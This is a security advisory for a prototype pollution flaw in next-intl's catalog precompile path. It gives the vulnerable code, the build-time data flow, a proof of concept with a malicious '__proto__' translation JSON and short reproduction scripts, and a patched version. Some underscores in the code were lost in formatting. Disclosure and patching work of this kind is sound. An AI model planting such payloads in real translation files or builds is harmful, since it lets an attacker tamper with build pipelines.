PT-2026-41475 · Npm · Next-Intl
Published
2026-05-06
·
Updated
2026-05-06
CVSS v3.1
4.2
Medium
| Vector | AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L |
Summary
setNestedProperty in packages/next-intl/src/extractor/utils.tsx walks a dotted key path and assigns the final value without blocking the reserved keys proto, constructor, or prototype. When the next-intl Next.js plugin is configured with experimental.messages and messages.precompile: true, a JSON translation catalog containing a top‑level proto key causes setNestedProperty(result, ' proto .isAdmin', compiledMessage) to assign onto Object.prototype, polluting every object in the running build process.Details
Root cause —
packages/next-intl/src/extractor/utils.tsx:13-34:ts
export function setNestedProperty(
obj: Record<string, any>,
keyPath: string,
value: any
): void {
const keys = keyPath.split('.');
let current = obj;
for (let i = 0; i < keys.length - 1; i++) {
const key = keys[i];
if (
!(key in current) ||
typeof current[key] !== 'object' ||
current[key] === null
) {
current[key] = {};
}
current = current[key];
}
current[keys[keys.length - 1]] = value;
}The existence check
!(key in current) uses the in operator, which walks the prototype chain. For key === ' proto ', ' proto ' in {} is true (it's inherited from Object.prototype) and typeof current[' proto '] === 'object' (it is Object.prototype). The guard therefore never re-initializes current[key], and current = current[' proto '] redirects all subsequent writes onto Object.prototype. The final assignment current[keys[keys.length-1]] = value sets Object.prototype[<attacker key>] = <attacker value>.Build-time data flow:
packages/next-intl/src/plugin/catalog/catalogLoader.tsx:55-83— the webpack/turbopack loader receives the catalog filesourceand, ifoptions.messages.precompileis enabled, callscodec.decode(source, {locale}).packages/next-intl/src/extractor/format/codecs/JSONCodec.tsx:9-18—decoderunsJSON.parse(source). V8 installsprotoas an own data property on the result when the JSON key is literally" proto "(bypassing the normalObject.prototype. protosetter that would otherwise reassign the prototype).JSONCodec.tsx:33-53—traverseMessagesiteratesObject.keys(obj), which for a JSON‑parsed object includes the ownprotokey. It readsobj. proto(returns the attacker’s nested object, notObject.prototype, because it's an own property), recurses into it, and emits message idproto .isAdmin.catalogLoader.tsx:71—precompileMessages(decoded, cache).catalogLoader.tsx:89-131— for each message, callssetNestedProperty(result, message.id, compiledMessage). Withmessage.id === ' proto .isAdmin',setNestedPropertywalks intoObject.prototypeand assignsObject.prototype.isAdmin = compiledMessage.
The same sink is also reachable via
JSONCodec.encode (JSONCodec.tsx:20-26) and POCodec (packages/next-intl/src/extractor/format/codecs/POCodec.tsx:87) during extraction, both of which feed attacker-influenced message.id values into setNestedProperty — but those paths require control of source-code identifiers, which is a weaker attack vector than the build-time catalog path above.After pollution, every subsequent object access during the remainder of the Next.js build pipeline (webpack, turbopack, babel, next-intl’s own logic) inherits the attacker-controlled properties. This is a classic gadget-chain precondition for corrupting build-tool internals and tampering with generated bundles, since many build tools use patterns like
if (obj.someFlag) or options[key] ?? default that are sensitive to polluted prototypes.Trust boundary note: next-intl’s message catalogs are realistically attacker-influenced in practice. Translation files are routinely round-tripped through external TMS systems (Crowdin, Lokalise, Transifex), accepted via community locale PRs, or pulled from third-party translation packages — any of which can carry a crafted
proto key unnoticed, since JSON translation diffs are usually merged with minimal scrutiny.PoC
Prerequisites: a Next.js project using next-intl ≤ 4.9.1 with the Next.js plugin configured:
ts
// next.config.ts
import createNextIntlPlugin from 'next-intl/plugin';
const withNextIntl = createNextIntlPlugin({
experimental: {
messages: {
path: './messages',
format: 'json',
locales: 'infer',
precompile: true
}
}
});
export default withNextIntl({});- Drop a malicious catalog at
messages/en.json:
json
{
"Greeting": "Hello",
" proto ": { "isAdmin": "polluted" }
}-
Run
next build(ornext dev). ThecatalogLoaderwill invokeJSONCodec.decode→traverseMessages→precompileMessages→setNestedProperty. -
Minimal reproduction of the sink itself (verified locally against the v4.9.1 source):
js
function setNestedProperty(obj, keyPath, value) {
const keys = keyPath.split('.');
let current = obj;
for (let i = 0; i < keys.length - 1; i++) {
const key = keys[i];
if (!(key in current) || typeof current[key] !== 'object' || current[key] === null) {
current[key] = {};
}
current = current[key];
}
current[keys[keys.length - 1]] = value;
}
setNestedProperty({}, ' proto .isAdmin', 'PWNED');
console.log(({}).isAdmin); // -> "PWNED"Output:
PWNED.- Full chain reproduction (also verified):
js
const parsed = JSON.parse('{"Greeting":"Hello"," proto ":{"isAdmin":"polluted"}}');
// traverseMessages emits: [{id:"Greeting",message:"Hello"},{id:" proto .isAdmin",message:"polluted"}]
// precompileMessages then calls setNestedProperty(result, " proto .isAdmin", "polluted")
console.log(({}).isAdmin); // -> "polluted"After the loader runs,
({}).isAdmin === 'polluted' for the remainder of the build Node process.Impact
Object.prototypeis polluted for the lifetime of the build‑time Node.js process, affecting every object created or inspected thereafter in the Next.js build pipeline (webpack/turbopack loaders, babel plugins, next-intl’s own codecs, user plugins).- Classic CWE-1321 gadget-chain precondition: downstream tools that branch on
obj.someFlag,options[key] ?? default,if (!config.noX), etc. can be coerced into unintended behavior, including emitting tampered bundles. - Realistic delivery vectors include TMS round-trips (Crowdin/Lokalise/Transifex), community locale PRs, and compromised/transitively-installed translation packages — all situations where a JSON catalog diff is routinely accepted without the scrutiny given to code changes.
- Exploitation requires the user to opt in to the
experimental.messages+precompileconfiguration. Users who do not use the extractor/precompile features are not affected.
Recommended Fix
Reject reserved keys in
setNestedProperty and stop using the in operator for the existence check. A minimal patch to packages/next-intl/src/extractor/utils.tsx:ts
const FORBIDDEN KEYS = new Set([' proto ', 'constructor', 'prototype']);
export function setNestedProperty(
obj: Record<string, any>,
keyPath: string,
value: any
): void {
const keys = keyPath.split('.');
for (const key of keys) {
if (FORBIDDEN KEYS.has(key)) {
throw new Error(`Invalid message id segment: ${key}`);
}
}
let current = obj;
for (let i = 0; i < keys.length - 1; i++) {
const key = keys[i];
if (
!Object.prototype.hasOwnProperty.call(current, key) ||
typeof current[key] !== 'object' ||
current[key] === null
) {
current[key] = Object.create(null);
}
current = current[key];
}
current[keys[keys.length - 1]] = value;
}Additionally:
- In
packages/next-intl/src/extractor/format/codecs/JSONCodec.tsx, maketraverseMessagesskip reserved keys (or switch toObject.create(null)+Object.hasOwnsemantics) so that a malicious catalog is rejected early with a clear error rather than producingproto .*message ids. - In
packages/next-intl/src/plugin/catalog/catalogLoader.tsx, initializeprecompileMessages’sresultwithObject.create(null)as defense in depth, so even if a key slipped through it could not redirect throughObject.prototype.
Fix
Prototype Pollution
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Next-Intl